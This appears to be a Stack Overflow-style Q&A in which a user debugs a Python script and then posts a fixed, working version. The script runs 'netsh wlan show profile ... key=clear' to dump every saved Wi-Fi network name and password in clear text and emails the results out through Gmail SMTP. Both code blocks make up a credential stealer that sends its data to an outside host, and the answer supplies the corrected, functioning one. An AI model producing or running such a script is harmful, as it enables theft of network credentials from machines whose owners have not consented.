# subprocess.CalledProcessError: PYTHON3

Tags: python, python-3.x, subprocess

I'm trying to write a program that will scan for wireless networks a computer was connected to, and send an email with the ssid and passwords of them.

```
#!/usr/bin/env python
import subprocess, smtplib, re

def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
net_names_list = re.findall("(?:Profile\s*:\s)(.*)", str(networks))

result = " "
for network_name in net_names_list:
    command = "netsh wlan show profile " + network_name + " key=clear"
    current_result = subprocess.check_output(command, shell=True)
    result = result + current_result

send_mail("example@gmail.com", "password", result)
```

I keep getting this error when trying to run it: subprocess.CalledProcessError: Command 'netsh wlan show profile MyNetwork\r\n\r\n' key=clear' returned non-zero exit status 1.

Answer (score 0):

I figured it out. For some reason it wasn't allowing me to use "str(xxxxx)", I had to use ".decode()" instead.

```
#!/usr/bin/env python
import subprocess, smtplib, re
 
def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()
 
 
command = "netsh wlan show profile "
networks = subprocess.check_output(command, shell=True)
net_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks.decode()) #Could not use "str(networks)" had to use "networks.decode()" instead.
 
result = ""
for network_name in net_names_list:
    command = "netsh wlan show profile " + network_name + " key=clear"
    current_result = subprocess.check_output(command, shell=True)
    result = result + current_result.decode()  #Could not use "str(current_result)" had to use ".decode()" instead.
 
send_mail("example@gmail.com", "password", result)
```